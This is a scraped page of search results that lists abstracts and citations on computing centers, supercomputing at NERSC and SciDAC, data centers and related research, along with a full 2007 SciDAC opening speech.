    Grazing incidence small-angle X-ray scattering (GISAXS) and grazing incidence wide-angle X-ray scattering (GIWAXS) are important techniques for characterizing thin films. In order to meet rapidly increasing demand, the SAXSWAXS beamline at the Advanced Light Source (beamline 7.3.3) has implemented a fully automated, high-throughput system to conduct SAXS, GISAXS and GIWAXS measurements. An automated robot arm transfers samples from a holding tray to a measurement stage. Intelligent software aligns each sample in turn, and measures each according to user-defined specifications. Users mail in trays of samples on individually barcoded pucks, and can download and view their data remotely. Data will be pipelined to the NERSC supercomputing facility, and will be available to users via a web portal that facilitates highly parallelized analysis.

  4. Computers in aeronautics and space research at the Lewis Research Center

    NASA Technical Reports Server (NTRS)

    1991-01-01

    This brochure presents a general discussion of the role of computers in aerospace research at NASA's Lewis Research Center (LeRC). Four particular areas of computer applications are addressed: computer modeling and simulation, computer assisted engineering, data acquisition and analysis, and computer controlled testing.

  5. User-Centered Computer Aided Language Learning

    ERIC Educational Resources Information Center

    Zaphiris, Panayiotis, Ed.; Zacharia, Giorgos, Ed.

    2006-01-01

    In the field of computer aided language learning (CALL), there is a need for emphasizing the importance of the user. "User-Centered Computer Aided Language Learning" presents methodologies, strategies, and design approaches for building interfaces for a user-centered CALL environment, creating a deeper understanding of the opportunities and…

  6. CFD Modeling Activities at the NASA Stennis Space Center

    NASA Technical Reports Server (NTRS)

    Allgood, Daniel

    2007-01-01

    A viewgraph presentation on NASA Stennis Space Center's Computational Fluid Dynamics (CFD) Modeling activities is shown. The topics include: 1) Overview of NASA Stennis Space Center; 2) Role of Computational Modeling at NASA-SSC; 3) Computational Modeling Tools and Resources; and 4) CFD Modeling Applications.

  7. Opening Remarks: SciDAC 2007

    NASA Astrophysics Data System (ADS)

    Strayer, Michael

    2007-09-01

    Good morning. Welcome to Boston, the home of the Red Sox, Celtics and Bruins, baked beans, tea parties, Robert Parker, and SciDAC 2007. A year ago I stood before you to share the legacy of the first SciDAC program and identify the challenges that we must address on the road to petascale computing—a road E E Cummins described as `. . . never traveled, gladly beyond any experience.' Today, I want to explore the preparations for the rapidly approaching extreme scale (X-scale) generation. These preparations are the first step propelling us along the road of burgeoning scientific discovery enabled by the application of X- scale computing. We look to petascale computing and beyond to open up a world of discovery that cuts across scientific fields and leads us to a greater understanding of not only our world, but our universe. As part of the President's America Competitiveness Initiative, the ASCR Office has been preparing a ten year vision for computing. As part of this planning the LBNL together with ORNL and ANL hosted three town hall meetings on Simulation and Modeling at the Exascale for Energy, Ecological Sustainability and Global Security (E3). The proposed E3 initiative is organized around four programmatic themes: Engaging our top scientists, engineers, computer scientists and applied mathematicians; investing in pioneering large-scale science; developing scalable analysis algorithms, and storage architectures to accelerate discovery; and accelerating the build-out and future development of the DOE open computing facilities. It is clear that we have only just started down the path to extreme scale computing. Plan to attend Thursday's session on the out-briefing and discussion of these meetings. The road to the petascale has been at best rocky. In FY07, the continuing resolution provided 12% less money for Advanced Scientific Computing than either the President, the Senate, or the House. As a consequence, many of you had to absorb a no cost extension for your SciDAC work. I am pleased that the President's FY08 budget restores the funding for SciDAC. Quoting from Advanced Scientific Computing Research description in the House Energy and Water Development Appropriations Bill for FY08, "Perhaps no other area of research at the Department is so critical to sustaining U.S. leadership in science and technology, revolutionizing the way science is done and improving research productivity." As a society we need to revolutionize our approaches to energy, environmental and global security challenges. As we go forward along the road to the X-scale generation, the use of computation will continue to be a critical tool along with theory and experiment in understanding the behavior of the fundamental components of nature as well as for fundamental discovery and exploration of the behavior of complex systems. The foundation to overcome these societal challenges will build from the experiences and knowledge gained as you, members of our SciDAC research teams, work together to attack problems at the tera- and peta- scale. If SciDAC is viewed as an experiment for revolutionizing scientific methodology, then a strategic goal of ASCR program must be to broaden the intellectual base prepared to address the challenges of the new X-scale generation of computing. We must focus our computational science experiences gained over the past five years on the opportunities introduced with extreme scale computing. Our facilities are on a path to provide the resources needed to undertake the first part of our journey. Using the newly upgraded 119 teraflop Cray XT system at the Leadership Computing Facility, SciDAC research teams have in three days performed a 100-year study of the time evolution of the atmospheric CO2 concentration originating from the land surface. The simulation of the El Nino/Southern Oscillation which was part of this study has been characterized as `the most impressive new result in ten years' gained new insight into the behavior of superheated ionic gas in the ITER reactor as a result of an AORSA run on 22,500 processors that achieved over 87 trillion calculations per second (87 teraflops) which is 74% of the system's theoretical peak. Tomorrow, Argonne and IBM will announce that the first IBM Blue Gene/P, a 100 teraflop system, will be shipped to the Argonne Leadership Computing Facility later this fiscal year. By the end of FY2007 ASCR high performance and leadership computing resources will include the 114 teraflop IBM Blue Gene/P; a 102 teraflop Cray XT4 at NERSC and a 119 teraflop Cray XT system at Oak Ridge. Before ringing in the New Year, Oak Ridge will upgrade to 250 teraflops with the replacement of the dual core processors with quad core processors and Argonne will upgrade to between 250-500 teraflops, and next year, a petascale Cray Baker system is scheduled for delivery at Oak Ridge. The multidisciplinary teams in our SciDAC Centers for Enabling Technologies and our SciDAC Institutes must continue to work with our Scientific Application teams to overcome the barriers that prevent effective use of these new systems. These challenges include: the need for new algorithms as well as operating system and runtime software and tools which scale to parallel systems composed of hundreds of thousands processors; program development environments and tools which scale effectively and provide ease of use for developers and scientific end users; and visualization and data management systems that support moving, storing, analyzing, manipulating and visualizing multi-petabytes of scientific data and objects. The SciDAC Centers, located primarily at our DOE national laboratories will take the lead in ensuring that critical computer science and applied mathematics issues are addressed in a timely and comprehensive fashion and to address issues associated with research software lifecycle. In contrast, the SciDAC Institutes, which are university-led centers of excellence, will have more flexibility to pursue new research topics through a range of research collaborations. The Institutes will also work to broaden the intellectual and researcher base—conducting short courses and summer schools to take advantage of new high performance computing capabilities. The SciDAC Outreach Center at Lawrence Berkeley National Laboratory complements the outreach efforts of the SciDAC Institutes. The Outreach Center is our clearinghouse for SciDAC activities and resources and will communicate with the high performance computing community in part to understand their needs for workshops, summer schools and institutes. SciDAC is not ASCR's only effort to broaden the computational science community needed to meet the challenges of the new X-scale generation. I hope that you were able to attend the Computational Science Graduate Fellowship poster session last night. ASCR developed the fellowship in 1991 to meet the nation's growing need for scientists and technology professionals with advanced computer skills. CSGF, now jointly funded between ASCR and NNSA, is more than a traditional academic fellowship. It has provided more than 200 of the best and brightest graduate students with guidance, support and community in preparing them as computational scientists. Today CSGF alumni are bringing their diverse top-level skills and knowledge to research teams at DOE laboratories and in industries such as Proctor and Gamble, Lockheed Martin and Intel. At universities they are working to train the next generation of computational scientists. To build on this success, we intend to develop a wholly new Early Career Principal Investigator's (ECPI) program. Our objective is to stimulate academic research in scientific areas within ASCR's purview especially among faculty in early stages of their academic careers. Last February, we lost Ken Kennedy, one of the leading lights of our community. As we move forward into the extreme computing generation, his vision and insight will be greatly missed. In memorial to Ken Kennedy, we shall designate the ECPI grants to beginning faculty in Computer Science as the Ken Kennedy Fellowship. Watch the ASCR website for more information about ECPI and other early career programs in the computational sciences. We look to you, our scientists, researchers, and visionaries to take X-scale computing and use it to explode scientific discovery in your fields. We at SciDAC will work to ensure that this tool is the sharpest and most precise and efficient instrument to carve away the unknown and reveal the most exciting secrets and stimulating scientific discoveries of our time. The partnership between research and computing is the marriage that will spur greater discovery, and as Spencer said to Susan in Robert Parker's novel, `Sudden Mischief', `We stick together long enough, and we may get as smart as hell'. Michael Strayer

  8. Mathematics and Computer Science | Argonne National Laboratory

    Science.gov Websites

    Genomics and Systems Biology LCRCLaboratory Computing Resource Center MCSGMidwest Center for Structural Genomics NAISENorthwestern-Argonne Institute of Science & Engineering SBCStructural Biology Center

  9. Computer Center Harris 1600 Operator’s Guide.

    DTIC Science & Technology

    1982-06-01

    RECIPIENT’S CATALOG NUMBER CMLD-82-15 Vb /9 7 ’ 4. TITLE (and Subtitle) S. TYPE OF REPORT & PERIOD COVERED Computer Center Harris 1600 Operator’s Guide...AD-AIAA 077 DAVID W TAYLOR NAVAL SHIP RESEARCH AND DEVELOPMENT CE--ETC F/G. 5/9 COMPUTER CENTER HARRIS 1600 OPEAATOR’S GUIDE.dU) M JUN 62 D A SOMMER...20084 COMPUTER CENTER HARRIS 1600 OPERATOR’s GUIDE by David V. Sommer & Sharon E. Good APPROVED FOR PUBLIC RELEASE: DISTRIBUTION UNLIMITED ’-.7 SJ0 o 0

  10. 77 FR 34941 - Privacy Act of 1974; Notice of a Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-12

    ...; Notice of a Computer Matching Program AGENCY: Defense Manpower Data Center, DoD. ACTION: Notice of a... computer matching program are the Department of Veterans Affairs (VA) and the Defense Manpower Data Center... identified as DMDC 01, entitled ``Defense Manpower Data Center Data Base,'' last published in the Federal...

  11. 77 FR 35432 - Privacy Act of 1974, Computer Matching Program: United States Postal Service and the Defense...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2012-06-13

    ... the Defense Manpower Data Center, Department of Defense AGENCY: Postal Service TM . ACTION: Notice of Computer Matching Program--United States Postal Service and the Defense Manpower Data Center, Department of... as the recipient agency in a computer matching program with the Defense Manpower Data Center (DMDC...

  12. Optimizing fusion PIC code performance at scale on Cori Phase 2

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Koskela, T. S.; Deslippe, J.

    In this paper we present the results of optimizing the performance of the gyrokinetic full-f fusion PIC code XGC1 on the Cori Phase Two Knights Landing system. The code has undergone substantial development to enable the use of vector instructions in its most expensive kernels within the NERSC Exascale Science Applications Program. We study the single-node performance of the code on an absolute scale using the roofline methodology to guide optimization efforts. We have obtained 2x speedups in single node performance due to enabling vectorization and performing memory layout optimizations. On multiple nodes, the code is shown to scale wellmore » up to 4000 nodes, near half the size of the machine. We discuss some communication bottlenecks that were identified and resolved during the work.« less

  13. Data Center Consolidation: A Step towards Infrastructure Clouds

    NASA Astrophysics Data System (ADS)

    Winter, Markus

    Application service providers face enormous challenges and rising costs in managing and operating a growing number of heterogeneous system and computing landscapes. Limitations of traditional computing environments force IT decision-makers to reorganize computing resources within the data center, as continuous growth leads to an inefficient utilization of the underlying hardware infrastructure. This paper discusses a way for infrastructure providers to improve data center operations based on the findings of a case study on resource utilization of very large business applications and presents an outlook beyond server consolidation endeavors, transforming corporate data centers into compute clouds.

  14. Computer Maintenance Operations Center (CMOC), additional computer support equipment ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    Computer Maintenance Operations Center (CMOC), additional computer support equipment - Beale Air Force Base, Perimeter Acquisition Vehicle Entry Phased-Array Warning System, Techinical Equipment Building, End of Spencer Paul Road, north of Warren Shingle Road (14th Street), Marysville, Yuba County, CA

  15. Exploring the Relationships between Self-Efficacy and Preference for Teacher Authority among Computer Science Majors

    ERIC Educational Resources Information Center

    Lin, Che-Li; Liang, Jyh-Chong; Su, Yi-Ching; Tsai, Chin-Chung

    2013-01-01

    Teacher-centered instruction has been widely adopted in college computer science classrooms and has some benefits in training computer science undergraduates. Meanwhile, student-centered contexts have been advocated to promote computer science education. How computer science learners respond to or prefer the two types of teacher authority,…

  16. Computer Maintenance Operations Center (CMOC), showing duplexed cyber 170174 computers ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    Computer Maintenance Operations Center (CMOC), showing duplexed cyber 170-174 computers - Beale Air Force Base, Perimeter Acquisition Vehicle Entry Phased-Array Warning System, Techinical Equipment Building, End of Spencer Paul Road, north of Warren Shingle Road (14th Street), Marysville, Yuba County, CA

  17. NASA Center for Computational Sciences: History and Resources

    NASA Technical Reports Server (NTRS)

    2000-01-01

    The Nasa Center for Computational Sciences (NCCS) has been a leading capacity computing facility, providing a production environment and support resources to address the challenges facing the Earth and space sciences research community.

  18. Center for Computing Research Summer Research Proceedings 2015.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bradley, Andrew Michael; Parks, Michael L.

    2015-12-18

    The Center for Computing Research (CCR) at Sandia National Laboratories organizes a summer student program each summer, in coordination with the Computer Science Research Institute (CSRI) and Cyber Engineering Research Institute (CERI).

  19. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Elbridge Gerry Puckett

    All of the work conducted under the auspices of DE-FC02-01ER25473 was characterized by exceptionally close collaboration with researchers at the Lawrence Berkeley National Laboratory (LBNL). This included having one of my graduate students - Sarah Williams - spend the summer working with Dr. Ann Almgren a staff scientist in the Center for Computational Sciences and Engineering (CCSE) which is a part of the National Energy Research Supercomputer Center (NERSC) at LBNL. As a result of this visit Sarah decided to work on a problem suggested by Dr. John Bell the head of CCSE for her PhD thesis, which she finishedmore » in June 2007. Writing a PhD thesis while working at one of the University of California (UC) managed DOE laboratories is a long established tradition at the University of California and I have always encouraged my students to consider doing this. For example, in 2000 one of my graduate students - Matthew Williams - finished his PhD thesis while working with Dr. Douglas Kothe at the Los Alamos National Laboratory (LANL). Matt is now a staff scientist in the Diagnostic Applications Group in the Applied Physics Division at LANL. Another one of my graduate students - Christopher Algieri - who was partially supported with funds from DE-FC02-01ER25473 wrote am MS Thesis that analyzed and extended work published by Dr. Phil Colella and his colleagues in 1998. Dr. Colella is the head of the Applied Numerical Algorithms Group (ANAG) in the National Energy Research Supercomputer Center at LBNL and is the lead PI for the APDEC ISIC which was comprised of several National Laboratory research groups and at least five University PI's at five different universities. Chris Algieri is now employed as a staff member in Dr. Bill Collins' research group at LBNL developing computational models for climate change research. Bill Collins was recently hired at LBNL to start and be the Head of the Climate Science Department in the Earth Sciences Division at LBNL. Prior to this he had been a Deputy Section Head at the National Center for Atmospheric Research in Colorado. My understanding is that Chris Algieri is the first person that Bill hired after coming to LBNL. The plan is that Chris Algieri will finish his PhD thesis while employed as a staff scientist in Bill's group. Both Sarah and Chris were supported in part with funds from DE-FC02-01ER25473. In Sarah's case she received support both while at U.C. Davis (UCD) taking classes and writing an MS thesis and during some of the time she was living in Berkeley, working at LBNL and finishing her PhD thesis. In Chris' case he was at U.C. Davis during the entire time he received support from DE-FC02-01ER25473. More specific details of their work are included in the report below. Finally my own research conducted under the auspices of DE-FC02-01ER25473 either involved direct collaboration with researchers at LBNL - Phil Colella and Peter Schwartz who is a member of Phil's Applied Numerical Algorithms Group - or was on problems that are closely related to research that has been and continues to be conducted by researchers at LBNL. Specific details of this work can be found below. Finally, I would like to note that the work conducted by my students and me under the auspices of this contract is closely related to work that I have performed with funding from my DOE MICS contract DE-FC02-03ER25579 'Development of High-Order Accurate Interface Tracking Algorithms and Improved Constitutive Models for Problems in Continuum Mechanics with Applications to Jetting' and with my CoPI on that grant Professor Greg Miller of the Department of Applied Science at UCD. In theory I tried to use funds from the SciDAC grant DE-FC02-01ER25473 to support work that directly involved implementing algorithms developed by my research group at U.C. Davis in software that was developed and is maintained by my SciDAC CoPI's at LBNL.« less

  20. 78 FR 45513 - Privacy Act of 1974; Computer Matching Program

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-07-29

    ...; Computer Matching Program AGENCY: Defense Manpower Data Center (DMDC), DoD. ACTION: Notice of a Computer... individual's privacy, and would result in additional delay in determining eligibility and, if applicable, the... Defense. NOTICE OF A COMPUTER MATCHING PROGRAM AMONG THE DEFENSE MANPOWER DATA CENTER, THE DEPARTMENT OF...

  1. 20. SITE BUILDING 002 SCANNER BUILDING IN COMPUTER ...

    Library of Congress Historic Buildings Survey, Historic Engineering Record, Historic Landscapes Survey

    20. SITE BUILDING 002 - SCANNER BUILDING - IN COMPUTER ROOM LOOKING AT "CONSOLIDATED MAINTENANCE OPERATIONS CENTER" JOB AREA AND OPERATION WORK CENTER. TASKS INCLUDE RADAR MAINTENANCE, COMPUTER MAINTENANCE, CYBER COMPUTER MAINTENANCE AND RELATED ACTIVITIES. - Cape Cod Air Station, Technical Facility-Scanner Building & Power Plant, Massachusetts Military Reservation, Sandwich, Barnstable County, MA

  2. Vanderbilt University Institute of Imaging Science Center for Computational Imaging XNAT: A multimodal data archive and processing environment.

    PubMed

    Harrigan, Robert L; Yvernault, Benjamin C; Boyd, Brian D; Damon, Stephen M; Gibney, Kyla David; Conrad, Benjamin N; Phillips, Nicholas S; Rogers, Baxter P; Gao, Yurui; Landman, Bennett A

    2016-01-01

    The Vanderbilt University Institute for Imaging Science (VUIIS) Center for Computational Imaging (CCI) has developed a database built on XNAT housing over a quarter of a million scans. The database provides framework for (1) rapid prototyping, (2) large scale batch processing of images and (3) scalable project management. The system uses the web-based interfaces of XNAT and REDCap to allow for graphical interaction. A python middleware layer, the Distributed Automation for XNAT (DAX) package, distributes computation across the Vanderbilt Advanced Computing Center for Research and Education high performance computing center. All software are made available in open source for use in combining portable batch scripting (PBS) grids and XNAT servers. Copyright © 2015 Elsevier Inc. All rights reserved.

  3. Energy 101: Energy Efficient Data Centers

    ScienceCinema

    None

    2018-04-16

    Data centers provide mission-critical computing functions vital to the daily operation of top U.S. economic, scientific, and technological organizations. These data centers consume large amounts of energy to run and maintain their computer systems, servers, and associated high-performance components—up to 3% of all U.S. electricity powers data centers. And as more information comes online, data centers will consume even more energy. Data centers can become more energy efficient by incorporating features like power-saving "stand-by" modes, energy monitoring software, and efficient cooling systems instead of energy-intensive air conditioners. These and other efficiency improvements to data centers can produce significant energy savings, reduce the load on the electric grid, and help protect the nation by increasing the reliability of critical computer operations.

  4. Evolution of the Virtualized HPC Infrastructure of Novosibirsk Scientific Center

    NASA Astrophysics Data System (ADS)

    Adakin, A.; Anisenkov, A.; Belov, S.; Chubarov, D.; Kalyuzhny, V.; Kaplin, V.; Korol, A.; Kuchin, N.; Lomakin, S.; Nikultsev, V.; Skovpen, K.; Sukharev, A.; Zaytsev, A.

    2012-12-01

    Novosibirsk Scientific Center (NSC), also known worldwide as Akademgorodok, is one of the largest Russian scientific centers hosting Novosibirsk State University (NSU) and more than 35 research organizations of the Siberian Branch of Russian Academy of Sciences including Budker Institute of Nuclear Physics (BINP), Institute of Computational Technologies, and Institute of Computational Mathematics and Mathematical Geophysics (ICM&MG). Since each institute has specific requirements on the architecture of computing farms involved in its research field, currently we've got several computing facilities hosted by NSC institutes, each optimized for a particular set of tasks, of which the largest are the NSU Supercomputer Center, Siberian Supercomputer Center (ICM&MG), and a Grid Computing Facility of BINP. A dedicated optical network with the initial bandwidth of 10 Gb/s connecting these three facilities was built in order to make it possible to share the computing resources among the research communities, thus increasing the efficiency of operating the existing computing facilities and offering a common platform for building the computing infrastructure for future scientific projects. Unification of the computing infrastructure is achieved by extensive use of virtualization technology based on XEN and KVM platforms. This contribution gives a thorough review of the present status and future development prospects for the NSC virtualized computing infrastructure and the experience gained while using it for running production data analysis jobs related to HEP experiments being carried out at BINP, especially the KEDR detector experiment at the VEPP-4M electron-positron collider.

  5. An investigation of the effects of touchpad location within a notebook computer.

    PubMed

    Kelaher, D; Nay, T; Lawrence, B; Lamar, S; Sommerich, C M

    2001-02-01

    This study evaluated effects of the location of a notebook computer's integrated touchpad, complimenting previous work in the area of desktop mouse location effects. Most often integrated touchpads are located in the computer's wrist rest, and centered on the keyboard. This study characterized effects of this bottom center location and four alternatives (top center, top right, right side, and bottom right) upon upper extremity posture, discomfort, preference, and performance. Touchpad location was found to significantly impact each of those measures. The top center location was particularly poor, in that it elicited more ulnar deviation, more shoulder flexion, more discomfort, and perceptions of performance impedance. In general, the bottom center, bottom right, and right side locations fared better, though subjects' wrists were more extended in the bottom locations. Suggestions for notebook computer design are provided.

  6. FY 72 Computer Utilization at the Transportation Systems Center

    DOT National Transportation Integrated Search

    1972-08-01

    The Transportation Systems Center currently employs a medley of on-site and off-site computer systems to obtain the computational support it requires. Examination of the monthly User Accountability Reports for FY72 indicated that during the fiscal ye...

  7. Evaluating System Parameters on a Dragonfly using Simulation and Visualization

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhatele, Abhinav; Jain, Nikhil; Livnat, Yarden

    The dragon y topology is becoming a popular choice for build- ing high-radix, low-diameter networks with high-bandwidth links. Even with a powerful network, preliminary experi- ments on Edison at NERSC have shown that for communica- tion heavy applications, job interference and thus presumably job placement remains an important factor. In this paper, we explore the e ects of job placement, job sizes, parallel workloads and network con gurations on network through- put to better understand inter-job interference. We use a simulation tool called Damsel y to model the network be- havior of Edison and study the impact of various systemmore » parameters on network throughput. Parallel workloads based on ve representative communication patters are used and the simulation studies on up to 131,072 cores are aided by a new visualization of the dragon y network.« less

  8. Ab initio study on the dynamics of furfural at the liquid-solid interfaces

    NASA Astrophysics Data System (ADS)

    Dang, Hongli; Xue, Wenhua; Shields, Darwin; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2013-03-01

    Catalytic biomass conversion sometimes occurs at the liquid-solid interfaces. We report ab initio molecular dynamics simulations at finite temperatures for the catalytic reactions involving furfural at the water-Pd and water-Cu interfaces. We found that, during the dynamic process, the furan ring of furfural prefers to be parallel to the Pd surface and the aldehyde group tends to be away from the Pd surface. On the other hand, at the water-Cu(111) interface, furfural prefers to be tilted to the Cu surface while the aldehyde group is bonded to the surface. In both cases, interaction of liquid water and furfural is identified. The difference of dynamic process of furfural at the two interfaces suggests different catalytic reaction mechanisms for the conversion of furfural, consistent with the experimental investigations. Supported by DOE (DE-SC0004600). Simulations and calculations were performed on XSED's and NERSC's supercomputers

  9. Decarboxylation of furfural on Pd(111): Ab initio molecular dynamics simulations

    NASA Astrophysics Data System (ADS)

    Xue, Wenhua; Dang, Hongli; Shields, Darwin; Liu, Yingdi; Jentoft, Friederike; Resasco, Daniel; Wang, Sanwu

    2013-03-01

    Furfural conversion over metal catalysts plays an important role in the studies of biomass-derived feedstocks. We report ab initio molecular dynamics simulations for the decarboxylation process of furfural on the palladium surface at finite temperatures. We observed and analyzed the atomic-scale dynamics of furfural on the Pd(111) surface and the fluctuations of the bondlengths between the atoms in furfural. We found that the dominant bonding structure is the parallel structure in which the furfural plane, while slightly distorted, is parallel to the Pd surface. Analysis of the bondlength fluctuations indicates that the C-H bond is the aldehyde group of a furfural molecule is likely to be broken first, while the C =O bond has a tendency to be isolated as CO. Our results show that the reaction of decarbonylation dominates, consistent with the experimental measurements. Supported by DOE (DE-SC0004600). Simulations and calculations were performed on XSEDE's and NERSC's supercomputers.

  10. Recent advances in the modeling of plasmas with the Particle-In-Cell methods

    NASA Astrophysics Data System (ADS)

    Vay, Jean-Luc; Lehe, Remi; Vincenti, Henri; Godfrey, Brendan; Lee, Patrick; Haber, Irv

    2015-11-01

    The Particle-In-Cell (PIC) approach is the method of choice for self-consistent simulations of plasmas from first principles. The fundamentals of the PIC method were established decades ago but improvements or variations are continuously being proposed. We report on several recent advances in PIC related algorithms, including: (a) detailed analysis of the numerical Cherenkov instability and its remediation, (b) analytic pseudo-spectral electromagnetic solvers in Cartesian and cylindrical (with azimuthal modes decomposition) geometries, (c) arbitrary-order finite-difference and generalized pseudo-spectral Maxwell solvers, (d) novel analysis of Maxwell's solvers' stencil variation and truncation, in application to domain decomposition strategies and implementation of Perfectly Matched Layers in high-order and pseudo-spectral solvers. Work supported by US-DOE Contracts DE-AC02-05CH11231 and the US-DOE SciDAC program ComPASS. Used resources of NERSC, supported by US-DOE Contract DE-AC02-05CH11231.

  11. Mapping to Irregular Torus Topologies and Other Techniques for Petascale Biomolecular Simulation

    PubMed Central

    Phillips, James C.; Sun, Yanhua; Jain, Nikhil; Bohm, Eric J.; Kalé, Laxmikant V.

    2014-01-01

    Currently deployed petascale supercomputers typically use toroidal network topologies in three or more dimensions. While these networks perform well for topology-agnostic codes on a few thousand nodes, leadership machines with 20,000 nodes require topology awareness to avoid network contention for communication-intensive codes. Topology adaptation is complicated by irregular node allocation shapes and holes due to dedicated input/output nodes or hardware failure. In the context of the popular molecular dynamics program NAMD, we present methods for mapping a periodic 3-D grid of fixed-size spatial decomposition domains to 3-D Cray Gemini and 5-D IBM Blue Gene/Q toroidal networks to enable hundred-million atom full machine simulations, and to similarly partition node allocations into compact domains for smaller simulations using multiple-copy algorithms. Additional enabling techniques are discussed and performance is reported for NCSA Blue Waters, ORNL Titan, ANL Mira, TACC Stampede, and NERSC Edison. PMID:25594075

  12. Kevin Regimbal | NREL

    Science.gov Websites

    -275-4303 Kevin Regimbal oversees NREL's High Performance Computing (HPC) Systems & Operations , engineering, and operations. Kevin is interested in data center design and computing as well as data center integration and optimization. Professional Experience HPC oversight: program manager, project manager, center

  13. The role of dedicated data computing centers in the age of cloud computing

    NASA Astrophysics Data System (ADS)

    Caramarcu, Costin; Hollowell, Christopher; Strecker-Kellogg, William; Wong, Antonio; Zaytsev, Alexandr

    2017-10-01

    Brookhaven National Laboratory (BNL) anticipates significant growth in scientific programs with large computing and data storage needs in the near future and has recently reorganized support for scientific computing to meet these needs. A key component is the enhanced role of the RHIC-ATLAS Computing Facility (RACF) in support of high-throughput and high-performance computing (HTC and HPC) at BNL. This presentation discusses the evolving role of the RACF at BNL, in light of its growing portfolio of responsibilities and its increasing integration with cloud (academic and for-profit) computing activities. We also discuss BNL’s plan to build a new computing center to support the new responsibilities of the RACF and present a summary of the cost benefit analysis done, including the types of computing activities that benefit most from a local data center vs. cloud computing. This analysis is partly based on an updated cost comparison of Amazon EC2 computing services and the RACF, which was originally conducted in 2012.

  14. CAROLINA CENTER FOR COMPUTATIONAL TOXICOLOGY

    EPA Science Inventory

    The Center will advance the field of computational toxicology through the development of new methods and tools, as well as through collaborative efforts. In each Project, new computer-based models will be developed and published that represent the state-of-the-art. The tools p...

  15. OpenMSI: A High-Performance Web-Based Platform for Mass Spectrometry Imaging

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Rubel, Oliver; Greiner, Annette; Cholia, Shreyas

    Mass spectrometry imaging (MSI) enables researchers to directly probe endogenous molecules directly within the architecture of the biological matrix. Unfortunately, efficient access, management, and analysis of the data generated by MSI approaches remain major challenges to this rapidly developing field. Despite the availability of numerous dedicated file formats and software packages, it is a widely held viewpoint that the biggest challenge is simply opening, sharing, and analyzing a file without loss of information. Here we present OpenMSI, a software framework and platform that addresses these challenges via an advanced, high-performance, extensible file format and Web API for remote data accessmore » (http://openmsi.nersc.gov). The OpenMSI file format supports storage of raw MSI data, metadata, and derived analyses in a single, self-describing format based on HDF5 and is supported by a large range of analysis software (e.g., Matlab and R) and programming languages (e.g., C++, Fortran, and Python). Careful optimization of the storage layout of MSI data sets using chunking, compression, and data replication accelerates common, selective data access operations while minimizing data storage requirements and are critical enablers of rapid data I/O. The OpenMSI file format has shown to provide >2000-fold improvement for image access operations, enabling spectrum and image retrieval in less than 0.3 s across the Internet even for 50 GB MSI data sets. To make remote high-performance compute resources accessible for analysis and to facilitate data sharing and collaboration, we describe an easy-to-use yet powerful Web API, enabling fast and convenient access to MSI data, metadata, and derived analysis results stored remotely to facilitate high-performance data analysis and enable implementation of Web based data sharing, visualization, and analysis.« less

  16. Adaptation of a Control Center Development Environment for Industrial Process Control

    NASA Technical Reports Server (NTRS)

    Killough, Ronnie L.; Malik, James M.

    1994-01-01

    In the control center, raw telemetry data is received for storage, display, and analysis. This raw data must be combined and manipulated in various ways by mathematical computations to facilitate analysis, provide diversified fault detection mechanisms, and enhance display readability. A development tool called the Graphical Computation Builder (GCB) has been implemented which provides flight controllers with the capability to implement computations for use in the control center. The GCB provides a language that contains both general programming constructs and language elements specifically tailored for the control center environment. The GCB concept allows staff who are not skilled in computer programming to author and maintain computer programs. The GCB user is isolated from the details of external subsystem interfaces and has access to high-level functions such as matrix operators, trigonometric functions, and unit conversion macros. The GCB provides a high level of feedback during computation development that improves upon the often cryptic errors produced by computer language compilers. An equivalent need can be identified in the industrial data acquisition and process control domain: that of an integrated graphical development tool tailored to the application to hide the operating system, computer language, and data acquisition interface details. The GCB features a modular design which makes it suitable for technology transfer without significant rework. Control center-specific language elements can be replaced by elements specific to industrial process control.

  17. Cloudbursting - Solving the 3-body problem

    NASA Astrophysics Data System (ADS)

    Chang, G.; Heistand, S.; Vakhnin, A.; Huang, T.; Zimdars, P.; Hua, H.; Hood, R.; Koenig, J.; Mehrotra, P.; Little, M. M.; Law, E.

    2014-12-01

    Many science projects in the future will be accomplished through collaboration among 2 or more NASA centers along with, potentially, external scientists. Science teams will be composed of more geographically dispersed individuals and groups. However, the current computing environment does not make this easy and seamless. By being able to share computing resources among members of a multi-center team working on a science/ engineering project, limited pre-competition funds could be more efficiently applied and technical work could be conducted more effectively with less time spent moving data or waiting for computing resources to free up. Based on the work from an NASA CIO IT Labs task, this presentation will highlight our prototype work in identifying the feasibility and identify the obstacles, both technical and management, to perform "Cloudbursting" among private clouds located at three different centers. We will demonstrate the use of private cloud computing infrastructure at the Jet Propulsion Laboratory, Langley Research Center, and Ames Research Center to provide elastic computation to each other to perform parallel Earth Science data imaging. We leverage elastic load balancing and auto-scaling features at each data center so that each location can independently define how many resources to allocate to a particular job that was "bursted" from another data center and demonstrate that compute capacity scales up and down with the job. We will also discuss future work in the area, which could include the use of cloud infrastructure from different cloud framework providers as well as other cloud service providers.

  18. Computers and Media Centers--A Winning Combination.

    ERIC Educational Resources Information Center

    Graf, Nancy

    1984-01-01

    Profile of the computer program offered by the library/media center at Chief Joseph Junior High School in Richland, Washington, highlights program background, operator's licensing procedure, the trainer license, assistance from high school students, need for more computers, handling of software, and helpful hints. (EJS)

  19. For operation of the Computer Software Management and Information Center (COSMIC)

    NASA Technical Reports Server (NTRS)

    Carmon, J. L.

    1983-01-01

    During the month of June, the Survey Research Center (SRC) at the University of Georgia designed new benefits questionnaires for computer software management and information center (COSMIC). As a test of their utility, these questionnaires are now used in the benefits identification process.

  20. Reinventing patient-centered computing for the twenty-first century.

    PubMed

    Goldberg, H S; Morales, A; Gottlieb, L; Meador, L; Safran, C

    2001-01-01

